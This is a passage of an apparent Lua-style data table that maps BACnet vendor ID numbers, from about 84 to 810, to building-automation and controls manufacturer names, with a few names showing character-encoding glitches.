\"Mitsubishi Heavy Industries Ltd.\",\n [84] = \"ITT Bell & Gossett\",\n [85] = \"Yamatake Building Systems Co. Ltd.\",\n [86] = \"The Watt Stopper Inc.\",\n [87] = \"Aichi Tokei Denki Co. Ltd.\",\n [88] = \"Activation Technologies LLC\",\n [89] = \"Saia-Burgess Controls Ltd.\",\n [90] = \"Hitachi Ltd.\",\n [91] = \"Novar Corp./Trend Control Systems Ltd.\",\n [92] = \"Mitsubishi Electric Lighting Corporation\",\n [93] = \"Argus Control Systems Ltd.\",\n [94] = \"Kyuki Corporation\",\n [95] = \"Richards-Zeta Building Intelligence Inc.\",\n [96] = \"Scientech R&D Inc.\",\n [97] = \"VCI Controls Inc.\",\n [98] = \"Toshiba Corporation\",\n [99] = \"Mitsubishi Electric Corporation Air Conditioning & Refrigeration Systems Works\",\n [100] = \"Custom Mechanical Equipment LLC\",\n [101] = \"ClimateMaster\",\n [102] = \"ICP Panel-Tec Inc.\",\n [103] = \"D-Tek Controls\",\n [104] = \"NEC Engineering Ltd.\",\n [105] = \"PRIVA BV\",\n [106] = \"Meidensha Corporation\",\n [107] = \"JCI Systems Integration Services\",\n [108] = \"Freedom Corporation\",\n [109] = \"Neuberger Geb\u00e4eautomation GmbH\",\n [110] = \"Sitronix\",\n [111] = \"Leviton Manufacturing\",\n [112] = \"Fujitsu Limited\",\n [113] = \"Emerson Network Power\",\n [114] = \"S. A. Armstrong Ltd.\",\n [115] = \"Visonet AG\",\n [116] = \"M&M Systems Inc.\",\n [117] = \"Custom Software Engineering\",\n [118] = \"Nittan Company Limited\",\n [119] = \"Elutions Inc. (Wizcon Systems SAS)\",\n [120] = \"Pacom Systems Pty. Ltd.\",\n [121] = \"Unico Inc.\",\n [122] = \"Ebtron Inc.\",\n [123] = \"Scada Engine\",\n [124] = \"AC Technology Corporation\",\n [125] = \"Eagle Technology\",\n [126] = \"Data Aire Inc.\",\n [127] = \"ABB Inc.\",\n [128] = \"Transbit Sp. z o. o.\",\n [129] = \"Toshiba Carrier Corporation\",\n [130] = \"Shenzhen Junzhi Hi-Tech Co. Ltd.\",\n [131] = \"Tokai Soft\",\n [132] = \"Blue Ridge Technologies\",\n [133] = \"Veris Industries\",\n [134] = \"Centaurus Prime\",\n [135] = \"Sand Network Systems\",\n [136] = \"Regulvar Inc.\",\n [137] = \"AFDtek Division of Fastek International Inc.\",\n [138] = \"PowerCold Comfort Air Solutions Inc.\",\n [139] = \"I Controls\",\n [140] = \"Viconics Electronics Inc.\",\n [141] = \"Yaskawa America Inc.\",\n [142] = \"DEOS control systems GmbH\",\n [143] = \"Digitale Mess- und Steuersysteme AG\",\n [144] = \"Fujitsu General Limited\",\n [145] = \"Project Engineering S.r.l.\",\n [146] = \"Sanyo Electric Co. Ltd.\",\n [147] = \"Integrated Information Systems Inc.\",\n [148] = \"Temco Controls Ltd.\",\n [149] = \"Airtek International Inc.\",\n [150] = \"Advantech Corporation\",\n [151] = \"Titan Products Ltd.\",\n [152] = \"Regel Partners\",\n [153] = \"National Environmental Product\",\n [154] = \"Unitec Corporation\",\n [155] = \"Kanden Engineering Company\",\n [156] = \"Messner Geb\u00e4etechnik GmbH\",\n [157] = \"Integrated.CH\",\n [158] = \"Price Industries\",\n [159] = \"SE-Elektronic GmbH\",\n [160] = \"Rockwell Automation\",\n [161] = \"Enflex Corp.\",\n [162] = \"ASI Controls\",\n [163] = \"SysMik GmbH Dresden\",\n [164] = \"HSC Regelungstechnik GmbH\",\n [165] = \"Smart Temp Australia Pty. Ltd.\",\n [166] = \"Cooper Controls\",\n [167] = \"Duksan Mecasys Co. Ltd.\",\n [168] = \"Fuji IT Co. Ltd.\",\n [169] = \"Vacon Plc\",\n [170] = \"Leader Controls\",\n [171] = \"Cylon Controls Ltd.\",\n [172] = \"Compas\",\n [173] = \"Mitsubishi Electric Building Techno-Service Co. Ltd.\",\n [174] = \"Building Control Integrators\",\n [175] = \"ITG Worldwide (M) Sdn Bhd\",\n [176] = \"Lutron Electronics Co. Inc.\",\n [178] = \"LOYTEC Electronics GmbH\",\n [179] = \"ProLon\",\n [180] = \"Mega Controls Limited\",\n [181] = \"Micro Control Systems Inc.\",\n [182] = \"Kiyon Inc.\",\n [183] = \"Dust Networks\",\n [184] = \"Advanced Building Automation Systems\",\n [185] = \"Hermos AG\",\n [186] = \"CEZIM\",\n [187] = \"Softing\",\n [188] = \"Lynxspring\",\n [189] = \"Schneider Toshiba Inverter Europe\",\n [190] = \"Danfoss Drives A/S\",\n [191] = \"Eaton Corporation\",\n [192] = \"Matyca S.A.\",\n [193] = \"Botech AB\",\n [194] = \"Noveo Inc.\",\n [195] = \"AMEV\",\n [196] = \"Yokogawa Electric Corporation\",\n [197] = \"GFR Gesellschaft f\u00fcelungstechnik\",\n [198] = \"Exact Logic\",\n [199] = \"Mass Electronics Pty Ltd dba Innotech Control Systems Australia\",\n [200] = \"Kandenko Co. Ltd.\",\n [201] = \"DTF Daten-Technik Fries\",\n [202] = \"Klimasoft Ltd.\",\n [203] = \"Toshiba Schneider Inverter Corporation\",\n [204] = \"Control Applications Ltd.\",\n [205] = \"KDT Systems Co. Ltd.\",\n [206] = \"Onicon Incorporated\",\n [207] = \"Automation Displays Inc.\",\n [208] = \"Control Solutions Inc.\",\n [209] = \"Remsdaq Limited\",\n [210] = \"NTT Facilities Inc.\",\n [211] = \"VIPA GmbH\",\n [212] = \"TSC21 Association of Japan\",\n [213] = \"Strato Automation\",\n [214] = \"HRW Limited\",\n [215] = \"Lighting Control & Design Inc.\",\n [216] = \"Mercy Electronic and Electrical Industries\",\n [217] = \"Samsung SDS Co.Ltd\",\n [218] = \"Impact Facility Solutions Inc.\",\n [219] = \"Aircuity\",\n [220] = \"Control Techniques Ltd.\",\n [221] = \"OpenGeneral Pty. Ltd.\",\n [222] = \"WAGO Kontakttechnik GmbH & Co. KG\",\n [223] = \"Cerus Industrial\",\n [224] = \"Chloride Power Protection Company\",\n [225] = \"Computrols Inc.\",\n [226] = \"Phoenix Contact GmbH & Co. KG\",\n [227] = \"Grundfos Management A/S\",\n [228] = \"Ridder Drive Systems\",\n [229] = \"Soft Device SDN BHD\",\n [230] = \"Integrated Control Technology Limited\",\n [231] = \"AIRxpert Systems Inc.\",\n [232] = \"Microtrol Limited\",\n [233] = \"Red Lion Controls\",\n [234] = \"Digital Electronics Corporation\",\n [235] = \"Ennovatis GmbH\",\n [236] = \"Serotonin Software Technologies Inc.\",\n [237] = \"LS Industrial Systems Co. Ltd.\",\n [238] = \"Square D Company\",\n [239] = \"S Squared Innovations Inc.\",\n [240] = \"Aricent Ltd.\",\n [241] = \"EtherMetrics LLC\",\n [242] = \"Industrial Control Communications Inc.\",\n [243] = \"Paragon Controls Inc.\",\n [244] = \"A. O. Smith Corporation\",\n [245] = \"Contemporary Control Systems Inc.\",\n [246] = \"Intesis Software SL\",\n [247] = \"Ingenieurgesellschaft N. Hartleb mbH\",\n [248] = \"Heat-Timer Corporation\",\n [249] = \"Ingrasys Technology Inc.\",\n [250] = \"Costerm Building Automation\",\n [251] = \"WILO SE\",\n [252] = \"Embedia Technologies Corp.\",\n [253] = \"Technilog\",\n [254] = \"HR Controls Ltd. & Co. KG\",\n [255] = \"Lennox International Inc.\",\n [256] = \"RK-Tec Rauchklappen-Steuerungssysteme GmbH & Co. KG\",\n [257] = \"Thermomax Ltd.\",\n [258] = \"ELCON Electronic Control Ltd.\",\n [259] = \"Larmia Control AB\",\n [260] = \"BACnet Stack at SourceForge\",\n [261] = \"G4S Security Services A/S\",\n [262] = \"Exor International S.p.A.\",\n [263] = \"Cristal Controles\",\n [264] = \"Regin AB\",\n [265] = \"Dimension Software Inc.\",\n [266] = \"SynapSense Corporation\",\n [267] = \"Beijing Nantree Electronic Co. Ltd.\",\n [268] = \"Camus Hydronics Ltd.\",\n [269] = \"Kawasaki Heavy Industries Ltd.\",\n [270] = \"Critical Environment Technologies\",\n [271] = \"ILSHIN IBS Co. Ltd.\",\n [272] = \"ELESTA Energy Control AG\",\n [273] = \"KROPMAN Installatietechniek\",\n [274] = \"Baldor Electric Company\",\n [275] = \"INGA mbH\",\n [276] = \"GE Consumer & Industrial\",\n [277] = \"Functional Devices Inc.\",\n [278] = \"ESAC\",\n [279] = \"M-System Co. Ltd.\",\n [280] = \"Yokota Co. Ltd.\",\n [281] = \"Hitranse Technology Co.LTD\",\n [282] = \"Federspiel Controls\",\n [283] = \"Kele Inc.\",\n [284] = \"Opera Electronics Inc.\",\n [285] = \"Gentec\",\n [286] = \"Embedded Science Labs LLC\",\n [287] = \"Parker Hannifin Corporation\",\n [288] = \"MaCaPS International Limited\",\n [289] = \"Link4 Corporation\",\n [290] = \"Romutec Steuer-u. Regelsysteme GmbH\",\n [291] = \"Pribusin Inc.\",\n [292] = \"Advantage Controls\",\n [293] = \"Critical Room Control\",\n [294] = \"LEGRAND\",\n [295] = \"Tongdy Control Technology Co. Ltd.\",\n [296] = \"ISSARO Integrierte Systemtechnik\",\n [297] = \"Pro-Dev Industries\",\n [298] = \"DRI-STEEM\",\n [299] = \"Creative Electronic GmbH\",\n [300] = \"Swegon AB\",\n [301] = \"Jan Brachacek\",\n [302] = \"Hitachi Appliances Inc.\",\n [303] = \"Real Time Automation Inc.\",\n [304] = \"ITEC Hankyu-Hanshin Co.\",\n [305] = \"Cyrus E&M Engineering Co. Ltd.\",\n [306] = \"Racine Federated Inc.\",\n [307] = \"Cirrascale Corporation\",\n [308] = \"Elesta GmbH Building Automation\",\n [309] = \"Securiton\",\n [310] = \"OSlsoft Inc.\",\n [311] = \"Hanazeder Electronic GmbH\",\n [312] = \"Honeywell Security DeutschlandNovar GmbH\",\n [313] = \"Siemens Energy & Automation Inc.\",\n [314] = \"ETM Professional Control GmbH\",\n [315] = \"Meitav-tec Ltd.\",\n [316] = \"Janitza Electronics GmbH\",\n [317] = \"MKS Nordhausen\",\n [318] = \"De Gier Drive Systems B.V.\",\n [319] = \"Cypress Envirosystems\",\n [320] = \"SMARTron s.r.o.\",\n [321] = \"Verari Systems Inc.\",\n [322] = \"K-W Electronic Service Inc.\",\n [323] = \"ALFA-SMART Energy Management\",\n [324] = \"Telkonet Inc.\",\n [325] = \"Securiton GmbH\",\n [326] = \"Cemtrex Inc.\",\n [327] = \"Performance Technologies Inc.\",\n [328] = \"Xtralis (Aust) Pty Ltd\",\n [329] = \"TROX GmbH\",\n [330] = \"Beijing Hysine Technology Co.Ltd\",\n [331] = \"RCK Controls Inc.\",\n [332] = \"Distech Controls SAS\",\n [333] = \"Novar/Honeywell\",\n [334] = \"The S4 Group Inc.\",\n [335] = \"Schneider Electric\",\n [336] = \"LHA Systems\",\n [337] = \"GHM engineering Group Inc.\",\n [338] = \"Cllimalux S.A.\",\n [339] = \"VAISALA Oyj\",\n [340] = \"COMPLEX (Beijing) TechnologyCo. Ltd.\",\n [341] = \"SCADAmetrics\",\n [342] = \"POWERPEG NSI Limited\",\n [343] = \"BACnet Interoperability Testing Services Inc.\",\n [344] = \"Teco a.s.\",\n [345] = \"Plexus Technology Inc.\",\n [346] = \"Energy Focus Inc.\",\n [347] = \"Powersmiths International Corp.\",\n [348] = \"Nichibei Co. Ltd.\",\n [349] = \"HKC Technology Ltd.\",\n [350] = \"Ovation Networks Inc.\",\n [351] = \"Setra Systems\",\n [352] = \"AVG Automation\",\n [353] = \"ZXC Ltd.\",\n [354] = \"Byte Sphere\",\n [355] = \"Generiton Co. Ltd.\",\n [356] = \"Holter Regelarmaturen GmbH & Co. KG\",\n [357] = \"Bedford Instruments LLC\",\n [358] = \"Standair Inc.\",\n [359] = \"WEG Automation - R&D\",\n [360] = \"Prolon Control Systems ApS\",\n [361] = \"Inneasoft\",\n [362] = \"ConneXSoft GmbH\",\n [363] = \"CEAG Notlichtsysteme GmbH\",\n [364] = \"Distech Controls Inc.\",\n [365] = \"Industrial Technology Research Institute\",\n [366] = \"ICONICS Inc.\",\n [367] = \"IQ Controls s.c.\",\n [368] = \"OJ Electronics A/S\",\n [369] = \"Rolbit Ltd.\",\n [370] = \"Synapsys Solutions Ltd.\",\n [371] = \"ACME Engineering Prod. Ltd.\",\n [372] = \"Zener Electric Pty Ltd.\",\n [373] = \"Selectronix Inc.\",\n [374] = \"Gorbet & Banerjee LLC.\",\n [375] = \"IME\",\n [376] = \"Stephen H. Dawson Computer Service\",\n [377] = \"Accutrol LLC\",\n [378] = \"Schneider Elektronik GmbH\",\n [379] = \"Alpha-Inno Tec GmbH\",\n [380] = \"ADMMicro Inc.\",\n [381] = \"Greystone Energy Systems Inc.\",\n [382] = \"CAP Technologie\",\n [383] = \"KeRo Systems\",\n [384] = \"Domat Control System s.r.o.\",\n [385] = \"Efektronics Pty. Ltd.\",\n [386] = \"Hekatron Vertriebs GmbH\",\n [387] = \"Securiton AG\",\n [388] = \"Carlo Gavazzi Controls SpA\",\n [389] = \"Chipkin Automation Systems\",\n [390] = \"Savant Systems LLC\",\n [391] = \"Simmtronic Lighting Controls\",\n [392] = \"Abelko Innovation AB\",\n [393] = \"Seresco Technologies Inc.\",\n [394] = \"IT Watchdogs\",\n [395] = \"Automation Assist Japan Corp.\",\n [396] = \"Thermokon Sensortechnik GmbH\",\n [397] = \"EGauge Systems LLC\",\n [398] = \"Quantum Automation (ASIA) PTE Ltd.\",\n [399] = \"Toshiba Lighting & Technology Corp.\",\n [400] = \"SPIN Engenharia de Automa\u00e7 Ltda.\",\n [401] = \"Logistics Systems & Software Services India PVT. Ltd.\",\n [402] = \"Delta Controls Integration Products\",\n [403] = \"Focus Media\",\n [404] = \"LUMEnergi Inc.\",\n [405] = \"Kara Systems\",\n [406] = \"RF Code Inc.\",\n [407] = \"Fatek Automation Corp.\",\n [408] = \"JANDA Software Company LLC\",\n [409] = \"Open System Solutions Limited\",\n [410] = \"Intelec Systems PTY Ltd.\",\n [411] = \"Ecolodgix LLC\",\n [412] = \"Douglas Lighting Controls\",\n [413] = \"iSAtech GmbH\",\n [414] = \"AREAL\",\n [415] = \"Beckhoff Automation GmbH\",\n [416] = \"IPAS GmbH\",\n [417] = \"KE2 Therm Solutions\",\n [418] = \"Base2Products\",\n [419] = \"DTL Controls LLC\",\n [420] = \"INNCOM International Inc.\",\n [421] = \"BTR Netcom GmbH\",\n [422] = \"Greentrol AutomationInc\",\n [423] = \"BELIMO Automation AG\",\n [424] = \"Samsung Heavy Industries CoLtd\",\n [425] = \"Triacta Power Technologies Inc.\",\n [426] = \"Globestar Systems\",\n [427] = \"MLB Advanced MediaLP\",\n [428] = \"SWG Stuckmann Wirtschaftliche Geb\u00e4esysteme GmbH\",\n [429] = \"SensorSwitch\",\n [430] = \"Multitek Power Limited\",\n [431] = \"Aquametro AG\",\n [432] = \"LG Electronics Inc.\",\n [433] = \"Electronic Theatre Controls Inc.\",\n [434] = \"Mitsubishi Electric Corporation Nagoya Works\",\n [435] = \"Delta Electronics Inc.\",\n [436] = \"Elma Kurtalj Ltd.\",\n [437] = \"ADT Fire and Security Sp. A.o.o.\",\n [438] = \"Nedap Security Management\",\n [439] = \"ESC Automation Inc.\",\n [440] = \"DSP4YOU Ltd.\",\n [441] = \"GE Sensing and Inspection Technologies\",\n [442] = \"Embedded Systems SIA\",\n [443] = \"BEFEGA GmbH\",\n [444] = \"Baseline Inc.\",\n [445] = \"M2M Systems Integrators\",\n [446] = \"OEMCtrl\",\n [447] = \"Clarkson Controls Limited\",\n [448] = \"Rogerwell Control System Limited\",\n [449] = \"SCL Elements\",\n [450] = \"Hitachi Ltd.\",\n [451] = \"Newron System SA\",\n [452] = \"BEVECO Gebouwautomatisering BV\",\n [453] = \"Streamside Solutions\",\n [454] = \"Yellowstone Soft\",\n [455] = \"Oztech Intelligent Systems Pty Ltd.\",\n [456] = \"Novelan GmbH\",\n [457] = \"Flexim Americas Corporation\",\n [458] = \"ICP DAS Co. Ltd.\",\n [459] = \"CARMA Industries Inc.\",\n [460] = \"Log-One Ltd.\",\n [461] = \"TECO Electric & Machinery Co. Ltd.\",\n [462] = \"ConnectEx Inc.\",\n [463] = \"Turbo DDC S\u00fc\",\n [464] = \"Quatrosense Environmental Ltd.\",\n [465] = \"Fifth Light Technology Ltd.\",\n [466] = \"Scientific Solutions Ltd.\",\n [467] = \"Controller Area Network Solutions (M) Sdn Bhd\",\n [468] = \"RESOL - Elektronische Regelungen GmbH\",\n [469] = \"RPBUS LLC\",\n [470] = \"BRS Sistemas Eletronicos\",\n [471] = \"WindowMaster A/S\",\n [472] = \"Sunlux Technologies Ltd.\",\n [473] = \"Measurlogic\",\n [474] = \"Frimat GmbH\",\n [475] = \"Spirax Sarco\",\n [476] = \"Luxtron\",\n [477] = \"Raypak Inc\",\n [478] = \"Air Monitor Corporation\",\n [479] = \"Regler Och Webbteknik Sverige (ROWS)\",\n [480] = \"Intelligent Lighting Controls Inc.\",\n [481] = \"Sanyo Electric Industry Co.Ltd\",\n [482] = \"E-Mon Energy Monitoring Products\",\n [483] = \"Digital Control Systems\",\n [484] = \"ATI Airtest Technologies Inc.\",\n [485] = \"SCS SA\",\n [486] = \"HMS Industrial Networks AB\",\n [487] = \"Shenzhen Universal Intellisys Co Ltd\",\n [488] = \"EK Intellisys Sdn Bhd\",\n [489] = \"SysCom\",\n [490] = \"Firecom Inc.\",\n [491] = \"ESA Elektroschaltanlagen Grimma GmbH\",\n [492] = \"Kumahira Co Ltd\",\n [493] = \"Hotraco\",\n [494] = \"SABO Elektronik GmbH\",\n [495] = \"Equip'Trans\",\n [496] = \"TCS Basys Controls\",\n [497] = \"FlowCon International A/S\",\n [498] = \"ThyssenKrupp Elevator Americas\",\n [499] = \"Abatement Technologies\",\n [500] = \"Continental Control Systems LLC\",\n [501] = \"WISAG Automatisierungstechnik GmbH & Co KG\",\n [502] = \"EasyIO\",\n [503] = \"EAP-Electric GmbH\",\n [504] = \"Hardmeier\",\n [505] = \"Mircom Group of Companies\",\n [506] = \"Quest Controls\",\n [507] = \"MestekInc\",\n [508] = \"Pulse Energy\",\n [509] = \"Tachikawa Corporation\",\n [510] = \"University of Nebraska-Lincoln\",\n [511] = \"Redwood Systems\",\n [512] = \"PASStec Industrie-Elektronik GmbH\",\n [513] = \"NgEK Inc.\",\n [514] = \"FAW Electronics Ltd\",\n [515] = \"Jireh Energy Tech Co. Ltd.\",\n [516] = \"Enlighted Inc.\",\n [517] = \"El-Piast Sp. Z o.o\",\n [518] = \"NetxAutomation Software GmbH\",\n [519] = \"Invertek Drives\",\n [520] = \"Deutschmann Automation GmbH & Co. KG\",\n [521] = \"EMU Electronic AG\",\n [522] = \"Phaedrus Limited\",\n [523] = \"Sigmatek GmbH & Co KG\",\n [524] = \"Marlin Controls\",\n [525] = \"CircutorSA\",\n [526] = \"UTC Fire & Security\",\n [527] = \"DENT Instruments Inc.\",\n [528] = \"FHP Manufacturing Company - Bosch Group\",\n [529] = \"GE Intelligent Platforms\",\n [530] = \"Inner Range Pty Ltd\",\n [531] = \"GLAS Energy Technology\",\n [532] = \"MSR-Electronic-GmbH\",\n [533] = \"Energy Control Systems Inc.\",\n [534] = \"EMT Controls\",\n [535] = \"Daintree Networks Inc.\",\n [536] = \"EURO ICC d.o.o\",\n [537] = \"TE Connectivity Energy\",\n [538] = \"GEZE GmbH\",\n [539] = \"NEC Corporation\",\n [540] = \"Ho Cheung International Company Limited\",\n [541] = \"Sharp Manufacturing Systems Corporation\",\n [542] = \"DOT CONTROLS a.s.\",\n [543] = \"BeaconMed\u00e60220\",\n [544] = \"Midea Commercial Aircon\",\n [545] = \"WattMaster Controls\",\n [546] = \"Kamstrup A/S\",\n [547] = \"CA Computer Automation GmbH\",\n [548] = \"Laars Heating Systems Company\",\n [549] = \"Hitachi Systems Ltd.\",\n [550] = \"Fushan AKE Electronic Engineering Co. Ltd.\",\n [551] = \"Toshiba International Corporation\",\n [552] = \"Starman Systems LLC\",\n [553] = \"Samsung Techwin Co. Ltd.\",\n [554] = \"ISAS-Integrated Switchgear and Systems P/L\",\n [556] = \"Obvius\",\n [557] = \"Marek Guzik\",\n [558] = \"Vortek Instruments LLC\",\n [559] = \"Universal Lighting Technologies\",\n [560] = \"Myers Power Products Inc.\",\n [561] = \"Vector Controls GmbH\",\n [562] = \"Crestron Electronics Inc.\",\n [563] = \"A&E Controls Limited\",\n [564] = \"Projektomontaza A.D.\",\n [565] = \"Freeaire Refrigeration\",\n [566] = \"Aqua Cooler Pty Limited\",\n [567] = \"Basic Controls\",\n [568] = \"GE Measurement and Control Solutions Advanced Sensors\",\n [569] = \"EQUAL Networks\",\n [570] = \"Millennial Net\",\n [571] = \"APLI Ltd\",\n [572] = \"Electro Industries/GaugeTech\",\n [573] = \"SangMyung University\",\n [574] = \"Coppertree Analytics Inc.\",\n [575] = \"CoreNetiX GmbH\",\n [576] = \"Acutherm\",\n [577] = \"Dr. Riedel Automatisierungstechnik GmbH\",\n [578] = \"Shina System Co.Ltd\",\n [579] = \"Iqapertus\",\n [580] = \"PSE Technology\",\n [581] = \"BA Systems\",\n [582] = \"BTICINO\",\n [583] = \"Monico Inc.\",\n [584] = \"iCue\",\n [585] = \"tekmar Control Systems Ltd.\",\n [586] = \"Control Technology Corporation\",\n [587] = \"GFAE GmbH\",\n [588] = \"BeKa Software GmbH\",\n [589] = \"Isoil Industria SpA\",\n [590] = \"Home Systems Consulting SpA\",\n [591] = \"Socomec\",\n [592] = \"Everex Communications Inc.\",\n [593] = \"Ceiec Electric Technology\",\n [594] = \"Atrila GmbH\",\n [595] = \"WingTechs\",\n [596] = \"Shenzhen Mek Intellisys Pte Ltd.\",\n [597] = \"Nestfield Co. Ltd.\",\n [598] = \"Swissphone Telecom AG\",\n [599] = \"PNTECH JSC\",\n [600] = \"Horner APG LLC\",\n [601] = \"PVI Industries LLC\",\n [602] = \"Ela-compil\",\n [603] = \"Pegasus Automation International LLC\",\n [604] = \"Wight Electronic Services Ltd.\",\n [605] = \"Marcom\",\n [606] = \"Exhausto A/S\",\n [607] = \"Dwyer Instruments Inc.\",\n [608] = \"Link GmbH\",\n [609] = \"Oppermann Regelgerate GmbH\",\n [610] = \"NuAire Inc.\",\n [611] = \"Nortec Humidity Inc.\",\n [612] = \"Bigwood Systems Inc.\",\n [613] = \"Enbala Power Networks\",\n [614] = \"Inter Energy Co. Ltd.\",\n [615] = \"ETC\",\n [616] = \"COMELEC S.A.R.L\",\n [617] = \"Pythia Technologies\",\n [618] = \"TrendPoint Systems Inc.\",\n [619] = \"AWEX\",\n [620] = \"Eurevia\",\n [621] = \"Kongsberg E-lon AS\",\n [622] = \"FlaktWoods\",\n [623] = \"E + E Elektronik GES M.B.H.\",\n [624] = \"ARC Informatique\",\n [625] = \"SKIDATA AG\",\n [626] = \"WSW Solutions\",\n [627] = \"Trefon Electronic GmbH\",\n [628] = \"Dongseo System\",\n [629] = \"Kanontec Intelligence Technology Co. Ltd.\",\n [630] = \"EVCO S.p.A.\",\n [631] = \"Accuenergy (CANADA) Inc.\",\n [632] = \"SoftDEL\",\n [633] = \"Orion Energy Systems Inc.\",\n [634] = \"Roboticsware\",\n [635] = \"DOMIQ Sp. z o.o.\",\n [636] = \"Solidyne\",\n [637] = \"Elecsys Corporation\",\n [638] = \"Conditionaire International Pty. Limited\",\n [639] = \"Quebec Inc.\",\n [640] = \"Homerun Holdings\",\n [641] = \"RFM Inc.\",\n [642] = \"Comptek\",\n [643] = \"Westco Systems Inc.\",\n [644] = \"Advancis Software & Services GmbH\",\n [645] = \"Intergrid LLC\",\n [646] = \"Markerr Controls Inc.\",\n [647] = \"Toshiba Elevator and Building Systems Corporation\",\n [648] = \"Spectrum Controls Inc.\",\n [649] = \"Mkservice\",\n [650] = \"Fox Thermal Instruments\",\n [651] = \"SyxthSense Ltd\",\n [652] = \"DUHA System S R.O.\",\n [653] = \"NIBE\",\n [654] = \"Melink Corporation\",\n [655] = \"Fritz-Haber-Institut\",\n [656] = \"MTU Onsite Energy GmbHGas Power Systems\",\n [657] = \"Omega Engineering Inc.\",\n [658] = \"Avelon\",\n [659] = \"Ywire Technologies Inc.\",\n [660] = \"M.R. Engineering Co. Ltd.\",\n [661] = \"Lochinvar LLC\",\n [662] = \"Sontay Limited\",\n [663] = \"GRUPA Slawomir Chelminski\",\n [664] = \"Arch Meter Corporation\",\n [665] = \"Senva Inc.\",\n [667] = \"FM-Tec\",\n [668] = \"Systems Specialists Inc.\",\n [669] = \"SenseAir\",\n [670] = \"AB IndustrieTechnik Srl\",\n [671] = \"Cortland Research LLC\",\n [672] = \"MediaView\",\n [673] = \"VDA Elettronica\",\n [674] = \"CSS Inc.\",\n [675] = \"Tek-Air Systems Inc.\",\n [676] = \"ICDT\",\n [677] = \"The Armstrong Monitoring Corporation\",\n [678] = \"DIXELL S.r.l\",\n [679] = \"Lead System Inc.\",\n [680] = \"ISM EuroCenter S.A.\",\n [681] = \"TDIS\",\n [682] = \"Trade FIDES\",\n [683] = \"Kn\u00fcbH (Emerson Network Power)\",\n [684] = \"Resource Data Management\",\n [685] = \"Abies Technology Inc.\",\n [686] = \"Amalva\",\n [687] = \"MIRAE Electrical Mfg. Co. Ltd.\",\n [688] = \"HunterDouglas Architectural Projects Scandinavia ApS\",\n [689] = \"RUNPAQ Group Co.Ltd\",\n [690] = \"Unicard SA\",\n [691] = \"IE Technologies\",\n [692] = \"Ruskin Manufacturing\",\n [693] = \"Calon Associates Limited\",\n [694] = \"Contec Co. Ltd.\",\n [695] = \"iT GmbH\",\n [696] = \"Autani Corporation\",\n [697] = \"Christian Fortin\",\n [698] = \"HDL\",\n [699] = \"IPID Sp. Z.O.O Limited\",\n [700] = \"Fuji Electric Co.Ltd\",\n [701] = \"View Inc.\",\n [702] = \"Samsung S1 Corporation\",\n [703] = \"New Lift\",\n [704] = \"VRT Systems\",\n [705] = \"Motion Control Engineering Inc.\",\n [706] = \"Weiss Klimatechnik GmbH\",\n [707] = \"Elkon\",\n [708] = \"Eliwell Controls S.r.l.\",\n [709] = \"Japan Computer Technos Corp\",\n [710] = \"Rational Network ehf\",\n [711] = \"Magnum Energy Solutions LLC\",\n [712] = \"MelRok\",\n [713] = \"VAE Group\",\n [714] = \"LGCNS\",\n [715] = \"Berghof Automationstechnik GmbH\",\n [716] = \"Quark Communications Inc.\",\n [717] = \"Sontex\",\n [718] = \"mivune AG\",\n [719] = \"Panduit\",\n [720] = \"Smart Controls LLC\",\n [721] = \"Compu-Aire Inc.\",\n [722] = \"Sierra\",\n [723] = \"ProtoSense Technologies\",\n [724] = \"Eltrac Technologies Pvt Ltd\",\n [725] = \"Bektas Invisible Controls GmbH\",\n [726] = \"Entelec\",\n [727] = \"Innexiv\",\n [728] = \"Covenant\",\n [729] = \"Davitor AB\",\n [730] = \"TongFang Technovator\",\n [731] = \"Building Robotics\",\n [732] = \"HSS-MSR UG\",\n [733] = \"FramTack LLC\",\n [734] = \"B. L. Acoustics\",\n [735] = \"Traxxon Rock Drills\",\n [736] = \"Franke\",\n [737] = \"Wurm GmbH & Co\",\n [738] = \"AddENERGIE\",\n [739] = \"Mirle Automation Corporation\",\n [740] = \"Ibis Networks\",\n [741] = \"ID-KARTA s.r.o.\",\n [742] = \"Anaren\",\n [743] = \"Span\",\n [744] = \"Bosch Thermotechnology Corp\",\n [745] = \"DRC Technology S.A.\",\n [746] = \"Shanghai Energy Building Technology Co\",\n [747] = \"Fraport AG\",\n [748] = \"Flowgroup\",\n [749] = \"Skytron Energy\",\n [750] = \"ALTEL Wicha\",\n [751] = \"Drupal\",\n [752] = \"Axiomatic Technology\",\n [753] = \"Bohnke + Partner\",\n [754] = \"Function 1\",\n [755] = \"Optergy Pty\",\n [756] = \"LSI Virticus\",\n [757] = \"Konzeptpark GmbH\",\n [758] = \"Hubbell Building Automation\",\n [759] = \"eCurv\",\n [760] = \"Agnosys GmbH\",\n [761] = \"Shanghai Sunfull Automation Co.\",\n [762] = \"Kurz Instruments\",\n [763] = \"Cias Elettronica S.r.l.\",\n [764] = \"Multiaqua\",\n [765] = \"BlueBox\",\n [766] = \"Sensidyne\",\n [767] = \"Viessmann Elektronik GmbH\",\n [768] = \"ADFweb.com srl\",\n [769] = \"Gaylord Industries\",\n [770] = \"Majur Ltd.\",\n [771] = \"Shanghai Huilin Technology Co.\",\n [772] = \"Exotronic\",\n [773] = \"Safecontrol spol s.r.o.\",\n [774] = \"Amatis\",\n [775] = \"Universal Electric Corporation\",\n [776] = \"iBACnet\",\n [778] = \"Smartrise Engineering\",\n [779] = \"Miratron\",\n [780] = \"SmartEdge\",\n [781] = \"Mitsubishi Electric Australia Pty Ltd\",\n [782] = \"Triangle Research International Ptd Ltd\",\n [783] = \"Produal Oy\",\n [784] = \"Milestone Systems A/S\",\n [785] = \"Trustbridge\",\n [786] = \"Feedback Solutions\",\n [787] = \"IES\",\n [788] = \"GE Critical Power\",\n [789] = \"Riptide IO\",\n [790] = \"Messerschmitt Systems AG\",\n [791] = \"Dezem Energy Controlling\",\n [792] = \"MechoSystems\",\n [793] = \"evon GmbH\",\n [794] = \"CS Lab GmbH\",\n [795] = \"8760 Enterprises\",\n [796] = \"Touche Controls\",\n [797] = \"Ontrol Teknik Malzeme San. ve Tic. A.S.\",\n [798] = \"Uni Control System Sp. Z o.o.\",\n [799] = \"Weihai Ploumeter Co.\",\n [800] = \"Elcom International Pvt. Ltd\",\n [801] = \"Philips Lighting\",\n [802] = \"AutomationDirect\",\n [803] = \"Paragon Robotics\",\n [804] = \"SMT System & Modules Technology AG\",\n [805] = \"OS Technology Service and Trading Co.\",\n [806] = \"CMR Controls Ltd\",\n [807] = \"Innovari\",\n [808] = \"ABB Control Products\",\n [809] = \"Gesellschaft fur Gebaudeautomation mbH\",\n [810] = \"RODI Systems Corp.\",\n [811] 